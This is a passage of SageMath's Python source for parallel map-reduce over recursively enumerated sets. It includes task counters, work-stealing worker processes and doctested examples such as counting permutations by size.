sage: proc_number(max_proc=1)
1
sage: proc_number(max_proc=2) in (1, 2)
True
"""
from sage.parallel.ncpus import ncpus
n = ncpus()
if max_proc is None:
return n
else:
return min(max_proc, n)
class AbortError(Exception):
r"""
Exception for aborting parallel computations.
This is used both as exception or as abort message.
TESTS::
sage: from sage.parallel.map_reduce import AbortError
sage: raise AbortError
Traceback (most recent call last):
...
AbortError
"""
pass
class ActiveTaskCounterDarwin(object):
r"""
Handling the number of active tasks.
A class for handling the number of active tasks in a distributed
computation process. This is essentially a semaphore, but Darwin OSes
do not correctly implement POSIX's semaphore semantic. So we use
a shared integer with a lock.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = mp.Value(ctypes.c_int, task_number)
self._lock = mp.Lock()
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)" % (self._active_tasks.value)
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise increment the counter and returns its value after the
incrementation.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
with self._lock:
# The following test is not necessary but is allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks.value <= 0:
return 0
self._active_tasks.value += 1
return self._active_tasks.value
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns
its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
with self._lock:
self._active_tasks.value -= 1
return self._active_tasks.value
def abort(self):
r"""
Set the task counter to zero.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
with self._lock:
self._active_tasks.value = 0
class ActiveTaskCounterPosix(object):
r"""
Handling the number of active tasks.
A class for handling the number of active tasks in a distributed
computation process. This is the standard implementation on POSIX
compliant OSes. We essentially wrap a semaphore.
.. note::
A legitimate question is whether there is a need in keeping the two
implementations. I ran the following experiment on my machine::
S = RecursivelyEnumeratedSet(
[[]],
lambda l: ([l[:i] + [len(l)] + l[i:]
for i in range(len(l) + 1)]
if len(l) < NNN else []),
structure='forest',
enumeration='depth')
%time sp = S.map_reduce(lambda z: x**len(z)); sp
For NNN = 10, averaging a dozen of runs, I got:
- Posix compliant implementation: 17.04 s
- Darwin implementation: 18.26 s
So there is a non negligible overhead. It will probably be worth it
if we try to cythonize the code. So I'm keeping both implementations.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = mp.Semaphore(task_number)
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)" % (self._active_tasks.get_value())
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise it increments the counter and returns its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
# The following test is not necessary but is allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks._semlock._is_zero():
return 0
self._active_tasks.release()
return self._active_tasks.get_value()
task_start.__doc__ = ActiveTaskCounterDarwin.task_start.__doc__
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns
its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
# We test if the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially put the
# semaphore to 0 to stop the computation so it is needed.
if not self._active_tasks.acquire(False):
return -1
return self._active_tasks.get_value()
def abort(self):
r"""
Set the task counter to zero.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
while self._active_tasks.acquire(False):
pass
ActiveTaskCounter = (ActiveTaskCounterDarwin if sys.platform == 'darwin'
else ActiveTaskCounterPosix)
# ActiveTaskCounter = ActiveTaskCounterDarwin # to debug Darwin implementation
class RESetMapReduce(object):
r"""
Map-Reduce on recursively enumerated sets.
INPUT:
Description of the set:
- either ``forest=f`` -- where ``f`` is a :class:`RecursivelyEnumeratedSet
of forest type<sage.combinat.backtrack.SearchForest>`
- or a triple ``roots, children, post_process`` as follows
- ``roots=r`` -- The root of the enumeration
- ``children=c`` -- a function iterating through children nodes,
given a parent node
- ``post_process=p`` -- a post-processing function
The option ``post_process`` allows for customizing the nodes that
are actually produced. Furthermore, if ``post_process(x)`` returns ``None``,
then ``x`` won't be output at all.
Description of the map/reduce operation:
- ``map_function=f`` -- (default to ``None``)
- ``reduce_function=red`` -- (default to ``None``)
- ``reduce_init=init`` -- (default to ``None``)
.. SEEALSO::
:mod:`the Map/Reduce module <sage.parallel.map_reduce>` for
details and examples.
"""
def __init__(self,
roots=None,
children=None,
post_process=None,
map_function=None,
reduce_function=None,
reduce_init=None,
forest=None):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: R = RESetMapReduce([[]], lambda: [[]])
sage: R
<sage.parallel.map_reduce.RESetMapReduce object at 0x...>
To silence the coverage checker::
sage: TestSuite(R).run(skip=['_test_pickling'])
"""
if forest is not None:
if not all(x is None for x in (roots, children, post_process)):
raise ValueError("forest arg is incompatible with roots, children and post_process")
self._forest = forest
self._roots = forest._roots
self.children = forest.children
if hasattr(forest, 'post_process'):
self.post_process = forest.post_process
else:
if roots is not None: self._roots = roots
if children is not None: self.children = children
if post_process is not None: self.post_process = post_process
if map_function is not None: self.map_function = map_function
if reduce_function is not None: self.reduce_function = reduce_function
if reduce_init is not None: self._reduce_init = reduce_init
self._profile = None
@lazy_attribute
def _forest(self):
r"""
Return the forest underlying the map-reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: f = EX._forest; f
An enumerated set with a forest structure
sage: f.an_element()
[]
"""
return RecursivelyEnumeratedSet(
self.roots(),
self.children,
post_process=self.post_process,
structure='forest',
enumeration='depth')
def roots(self):
r"""
Return the roots of ``self``.
OUTPUT:
An iterable of nodes.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(42)
sage: S.roots()
42
"""
return self._roots
def map_function(self, o):
r"""
Return the function mapped by ``self``.
INPUT:
- ``o`` -- a node
OUTPUT:
By default ``1``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.map_function(7)
1
sage: S = RESetMapReduce(map_function = lambda x: 3*x + 5)
sage: S.map_function(7)
26
"""
return 1
def reduce_function(self, a, b):
r"""
Return the reducer function for ``self``.
INPUT:
- ``a``, ``b`` -- two values to be reduced
OUTPUT:
By default the sum of ``a`` and ``b``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_function(4, 3)
7
sage: S = RESetMapReduce(reduce_function=lambda x,y: x*y)
sage: S.reduce_function(4, 3)
12
"""
return a+b
def post_process(self, a):
r"""
Return the image of ``a`` under the post-processing function for ``self``.
INPUT:
- ``a`` -- a node
With the default post-processing function, which is the identity function,
this returns ``a`` itself.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.post_process(4)
4
sage: S = RESetMapReduce(post_process=lambda x: x*x)
sage: S.post_process(4)
16
"""
return a
_reduce_init = 0
def reduce_init(self):
r"""
Return the initial element for a reduction.
.. note:: This should be overloaded in applications.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_init()
0
sage: S = RESetMapReduce(reduce_init = 2)
sage: S.reduce_init()
2
"""
return copy.copy(self._reduce_init)
def setup_workers(self, max_proc=None, reduce_locally=True):
r"""
Setup the communication channels.
INPUT:
- ``max_proc`` -- (integer) an upper bound on the number of
worker processes.
- ``reduce_locally`` -- whether the workers should reduce locally
their work or sends results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: S._results
<multiprocessing.queues.Queue object at 0x...>
sage: len(S._workers)
2
"""
self._nprocess = proc_number(max_proc)
self._results = mp.Queue()
self._active_tasks = ActiveTaskCounter(self._nprocess)
self._done = mp.Lock()
self._aborted = mp.Value(ctypes.c_bool, False)
sys.stdout.flush()
sys.stderr.flush()
self._workers = [RESetMapReduceWorker(self, i, reduce_locally)
for i in range(self._nprocess)]
def start_workers(self):
r"""
Launch the workers.
The workers should have been created using :meth:`setup_workers`.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: def children(x):
....: sleep(0.5)
....: return []
sage: S = RESetMapReduce(roots=[1], children=children)
sage: S.setup_workers(2)
sage: S.start_workers()
sage: all(w.is_alive() for w in S._workers)
True
sage: sleep(1)
sage: all(not w.is_alive() for w in S._workers)
True
Cleanup::
sage: S.finish()
"""
if self._nprocess == 0:
raise ValueError("No process connected")
logger.info("Starting work with %s processes", self._nprocess)
logger.debug("Distributing tasks")
for i, task in enumerate(self.roots()):
self._workers[i % len(self._workers)]._todo.append(task)
logger.debug("Starting processes")
sys.stdout.flush()
sys.stderr.flush()
for w in self._workers: w.start()
def get_results(self, timeout=None):
r"""
Get the results from the queue.
OUTPUT:
The reduction of the results of all the workers, that is, the result of
the map/reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: for v in [1, 2, None, 3, None]: S._results.put(v)
sage: S.get_results()
6
Cleanup::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
res = self.reduce_init()
active_proc = self._nprocess
while active_proc > 0:
try:
logger.debug('Waiting on results; active_proc: %s, '
'timeout: %s, aborted: %s' %
(active_proc, timeout, self._aborted.value))
newres = self._results.get(timeout=timeout)
except queue.Empty:
logger.debug('Timed out waiting for results; aborting')
# If we timed out here then the abort timer should have
# already fired, but just in case it didn't (or is in
# progress) wait for it to finish
self._timer.join()
return
if newres is not None:
logger.debug("Got one result")
res = self.reduce_function(res, newres)
else:
active_proc -= 1
return res
def finish(self):
r"""
Destroy the workers and all the communication objects.
Communication statistics are gathered before destroying the workers.
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=5)
sage: S.setup_workers(2) # indirect doctest
sage: S._workers[0]._todo.append([])
sage: for w in S._workers: w.start()
sage: _ = S.get_results()
sage: S._shutdown()
sage: S.print_communication_statistics()
Traceback (most recent call last):
...
AttributeError: 'RESetMPExample' object has no attribute '_stats'
sage: S.finish()
sage: S.print_communication_statistics()
#proc: ...
...
sage: _ = S.run() # cleanup
.. SEEALSO:: :meth:`print_communication_statistics`
"""
if not self._aborted.value:
logger.debug("Joining worker processes...")
for worker in self._workers:
logger.debug("Joining %s" % worker.name)
worker.join()
logger.debug("Joining done")
else:
logger.debug("Killing worker processes...")
for worker in self._workers:
logger.debug("Terminating %s" % worker.name)
worker.terminate()
logger.debug("Killing done")
del self._results, self._active_tasks, self._done
self._get_stats()
del self._workers
def abort(self):
r"""
Abort the current parallel computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator([[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 17 else [])
sage: it = iter(S)
sage: next(it) # random
[]
sage: S.abort()
sage: hasattr(S, 'work_queue')
False
Cleanup::
sage: S.finish()
"""
logger.info("Abort called")
self._aborted.value = True
self._active_tasks.abort()
self._shutdown()
def _shutdown(self):
r"""
Shutdown the workers.
Sends a poison pill to all workers and their thief thread.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: for w in S._workers: w.start()
sage: S._shutdown()
Cleanup::
sage: S.finish()
"""
if self._done.acquire(False):
logger.debug("***************** FINISHED ******************")
logger.debug("Sending poison pills")
for worker in self._workers:
worker._request.put(AbortError)
for worker in self._workers:
worker._write_task.send(AbortError)
def _signal_task_start(self):
r"""
Signal a starting task.
Used by the worker to signal that a new task is starting. As soon as
there are no more active task, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_start()
sage: S._active_tasks
ActiveTaskCounter(value=3)
Signaling one time too many raises an :exc:`AbortError`::
sage: S._signal_task_done()
sage: S._signal_task_done()
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
"""
if self._active_tasks.task_start() == 0:
raise AbortError
def _signal_task_done(self):
r"""
Signal a task is done.
Used by the worker to signal that a task is done. As soon as
there are no more active task, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator(
....: [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_done()
sage: S._active_tasks
ActiveTaskCounter(value=1)
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
Cleanup::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
# We test if the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially put the
# semaphore to 0 to stop the computation so that it is needed.
if self._active_tasks.task_done() <= 0:
logger.debug("raising AbortError")
self._shutdown()
raise AbortError
def random_worker(self):
r"""
Return a random worker.
OUTPUT:
A worker for ``self`` chosen at random.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: EX.random_worker()
<RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
sage: EX.random_worker() in EX._workers
True
Cleanup::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
victim = random.randint(0, len(self._workers)-1)
return self._workers[victim]
def run(self,
max_proc=None,
reduce_locally=True,
timeout=None,
profile=None):
r"""
Run the computations.
INPUT:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``reduce_locally`` -- See :class:`RESetMapReduceWorker` (default: ``True``)
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``profile`` -- directory/filename prefix for profiling, or ``None``
for no profiling (default: ``None``)
OUTPUT:
The result of the map/reduce computation or an exception
:exc:`AbortError` if the computation was interrupted or timeout.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 8)
sage: EX.run()
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Here is an example or how to deal with timeout::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 100)
sage: try:
....: res = EX.run(timeout=0.01)
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
self._profile=profile
self.setup_workers(max_proc, reduce_locally)
self.start_workers()
if timeout is not None:
from threading import Timer
self._timer = Timer(timeout, self.abort)
self._timer.start()
self.result = self.get_results(timeout=timeout)
if timeout is not None:
self._timer.cancel()
logger.info("Returning")
self.finish()
if self._aborted.value:
raise AbortError
else:
return self.result
def _get_stats(self):
r"""
Gather the communication statistics at the end of a run.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run() # indirect doctest
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
res = []
for i in range(self._nprocess):
res.append(tuple(self._workers[i]._stats))
self._stats = res
def print_communication_statistics(self, blocksize=16):
r"""
Print the communication statistics in a nice way.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
sage: S.print_communication_statistics() # random
#proc: 0 1 2 3 4 5 6 7
reqs sent: 5 2 3 11 21 19 1 0
reqs rcvs: 10 10 9 5 1 11 9 2
- thefs: 1 0 0 0 0 0 0 0
+ thefs: 0 0 1 0 0 0 0 0
"""
res = [""] # classic trick to have a local variable shared with the
# local function (see e.g:
# https://stackoverflow.com/questions/2609518/python-nested-function-scopes).
def pstat(name, start, end, ist):
res[0] += ("\n" + name + " ".join(
"%4i" % (self._stats[i][ist]) for i in range(start, end)))
for start in range(0, self._nprocess, blocksize):
end = min(start+blocksize, self._nprocess)
res[0] = ("#proc: " +
" ".join("%4i" % (i) for i in range(start, end)))
pstat("reqs sent: ", start, end, 0)
pstat("reqs rcvs: ", start, end, 1)
pstat("- thefs: ", start, end, 2)
pstat("+ thefs: ", start, end, 3)
print(res[0])
def run_serial(self):
r"""
Run the computation serially (mostly for tests).
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 4)
sage: EX.run_serial()
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
import functools
return functools.reduce(self.reduce_function,
(self.map_function(x) for x in self._forest),
self.reduce_init())
class RESetMapReduceWorker(mp.Process):
"""
Worker for generate-map-reduce.
This shouldn't be called directly, but instead created by
:meth:`RESetMapReduce.setup_workers`.
INPUT:
- ``mapred`` -- the instance of :class:`RESetMapReduce` for which
this process is working.
- ``iproc`` -- the id of this worker.
- ``reduce_locally`` -- when reducing the results. Three possible values
are supported:
* ``True`` -- means the reducing work is done all locally, the result is
only sent back at the end of the work. This ensure the lowest level of
communication.
* ``False`` -- results are sent back after each finished branches, when
the process is asking for more work.
"""
def __init__(self, mapred, iproc, reduce_locally):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample()
sage: RESetMapReduceWorker(EX, 200, True)
<RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
"""
mp.Process.__init__(self)
self._iproc = iproc
self._todo = collections.deque()
self._request = mp.SimpleQueue() # Faster than Queue
# currently this is not possible to have to simultaneous read or write
# on the following Pipe. So there is no need to have a queue.
self._read_task, self._write_task = mp.Pipe(duplex=False)
self._mapred = mapred
self._stats = mp.RawArray('i', 4)
self._reduce_locally = reduce_locally
def _thief(self):
r"""
Return the thief thread of this worker process.
"""
logger.debug("Thief started")
reqs = 0
thefts = 0
try:
for ireq in iter(self._request.get, AbortError):
reqs +=1
target = self._mapred._workers[ireq]
logger.debug("Got a Steal request from %s" % target.name)
self._mapred._signal_task_start()
try:
work = self._todo.popleft()
except IndexError:
target._write_task.send(None)
logger.debug("Failed Steal %s" % target.name)
self._mapred._signal_task_done()
else:
target._write_task.send(work)
logger.debug("Succesful Steal %s" % target.name)
thefts += 1
except AbortError:
logger.debug("Thief aborted")
else:
logger.debug("Thief received poison pill")
if self._mapred._aborted.value: # Computation was aborted
self._todo.clear()
else: # Check that there is no remaining work
assert len(self._todo) == 0, "Bad stop the result may be wrong"
self._stats[1] = reqs
self._stats[2] = thefts
logger.debug("Thief Exiting")
def steal(self):
r"""
Steal some node from another worker.
OUTPUT:
A node stolen from another worker chosen at random.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: w0, w1 = EX._workers
sage: w0._todo.append(42)
sage: thief0 = Thread(target = w0._thief, name="Thief")
sage: thief0.start() # known bug (Trac #27537)
sage: w1.steal() # known bug (Trac #27537)
42
sage: w0._todo # known bug (Trac #27537)
deque([])
"""
self._mapred._signal_task_done()
node = None
while node is None:
victim = self._mapred.random_worker()
if victim is not self:
logger.debug("Trying to steal from %s" % victim.name)
victim._request.put(self._iproc)
self._stats[0] += 1
logger.debug("waiting for steal answer from %s" % victim.name)
node = self._read_task.recv()
# logger.debug("Request answer: %s" % (node,))
if node is AbortError:
raise AbortError
# logger.debug("Received a stolen node: %s" % (node,))
self._stats[3] += 1
return node
def run(self):
r"""
The main function executed by the worker.
Calls :meth:`run_myself` after possibly setting up parallel profiling.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run()
sage: sleep(1)
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
profile = self._mapred._profile
if profile is not None:
import cProfile
PROFILER = cProfile.Profile()
PROFILER.runcall(self.run_myself)
output = profile + str(self._iproc)
logger.warn("Profiling in %s ..." % output)
PROFILER.dump_stats(output)
else:
self.run_myself()
def run_myself(self):
r"""
The main function executed by the worker.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run_myself()
sage: sleep(1)
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
logger.debug("Started")
mapred = self._mapred
reduce_init = mapred.reduce_init
results = mapred._results
self._stats[0] = 0
self._stats[3] = 0
logger.debug("Launching thief")
self._thief = Thread(target = self._thief, name="Thief")
self._thief.start()
self._res = reduce_init()
try:
while True:
try:
node = self._todo.pop()
except IndexError:
node = self.steal()
self.walk_branch_locally(node)
if not self._reduce_locally:
self.send_partial_result()
except AbortError:
logger.debug("Worker Done !")
results.put(self._res)
results.put(None)
self._thief.join()
del self._request
self._read_task.close()
self._write_task.close()
del self._read_task, self._write_task
del self._mapred
del self._stats
logger.debug("Exiting")
def send_partial_result(self):
r"""
Send results to the MapReduce process.
Send the result stored in ``self._res`` to the master an reinitialize it to
``master.reduce_init``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._res = 4
sage: w.send_partial_result()
sage: w._res
0
sage: EX._results.get()
4
"""
self._mapred._results.put(self._res)
self._res = self._mapred.reduce_init()
def walk_branch_locally(self, node):
r"""
Work locally.
Performs the map/reduce computation on the subtrees rooted at ``node``.
INPUT:
- ``node`` -- the root of the subtree explored.
OUTPUT:
Nothing, the result are stored in ``self._res``.
This is where the actual work is performed.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: w = RESetMapReduceWorker(EX, 0, True)
sage: def sync(): pass
sage: w.synchronize = sync
sage: w._res = 0
sage: w.walk_branch_locally([])
sage: w._res
x^4 + x^3 + x^2 + x + 1
sage: w.walk_branch_locally(w._todo.pop())
sage: w._res
2*x^4 + x^3 + x^2 + x + 1
sage: while True: w.walk_branch_locally(w._todo.pop())
Traceback (most recent call last):
...
IndexError: pop from an empty deque
sage: w._res
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
mapred = self._mapred
children = mapred.children
post_process = mapred.post_process
fun = mapred.map_function
reduc = mapred.reduce_function
# logger.debug("Working on %s..." % (node,))
while True:
res = post_process(node)
if res is not None:
self._res = reduc(self._res, fun(res))
newnodes = iter(children(node))
try:
node = next(newnodes)
except StopIteration:
return
self._todo.extend(newnodes)
class RESetMPExample(RESetMapReduce):
r"""
An example of map reduce class.
INPUT:
- ``maxl`` -- the maximum size of permutations generated (default to `9`).
This computes the generating series of permutations counted by their size
up to size ``maxl``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: EX.run()
362880*x^9 + 40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5
+ 24*x^4 + 6*x^3 + 2*x^2 + x + 1
.. SEEALSO:: This is an example of :class:`RESetMapReduce`
"""
def __init__(self, maxl = 9):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample()
<sage.parallel.map_reduce.RESetMPExample object at 0x...>
"""
RESetMapReduce.__init__(self)
from sage.rings.polynomial.polynomial_ring import polygen
from sage.rings.integer_ring import ZZ
self.x = polygen(ZZ, 'x')
self.maxl = maxl
def roots(self):
r"""
Return the empty permutation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().roots()
[[]]
"""
return [[]]
def children(self, l):
r"""
Return the children of the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
The lists with ``len(l)`` inserted at all possible positions into ``l``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().children([1,0])
[[2, 1, 0], [1, 2, 0], [1, 0, 2]]
"""
return [ l[:i] + [len(l)] + l[i:]
for i in range(len(l)+1) ] if len(l) < self.maxl else []
def map_function(self, l):
r"""
The monomial associated to the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
The monomial ``x^len(l)``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().map_function([1,0])
x^2
"""
return self.x**len(l)
class RESetParallelIterator(RESetMapReduce):
r"""
A parallel iterator for recursively enumerated sets.
This demonstrates how to use :class:`RESetMapReduce` to get an iterator on
a recursively enumerated set for which the computations are done in
parallel.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator([[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: sum(1 for _ in S)
65535
"""
def map_function(self, z):
r"""
Return a singleton tuple.
INPUT:
- ``z`` -- a node
OUTPUT:
The singleton ``(z, )``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: S.map_function([1, 0])
([1, 0],)
"""
return (z,)
reduce_init = tuple
def __iter__(self):
r"""
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: it = iter(S)
sage: next(it) # random
[1, 1, 0]
sage: next(it) # random
[1, 1, 0, 1]
sage: sum(1 for _ in it)
65533
"""
self.setup_workers(reduce_locally=False)
self.start_workers()
active_proc = self._nprocess
while True:
newres = self._results.get()
if newres is not None:
logger.debug("Got some results")
for r in newres:
yield r
else:
active_proc -= 1
if active_proc == 0:
break
self.finish()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.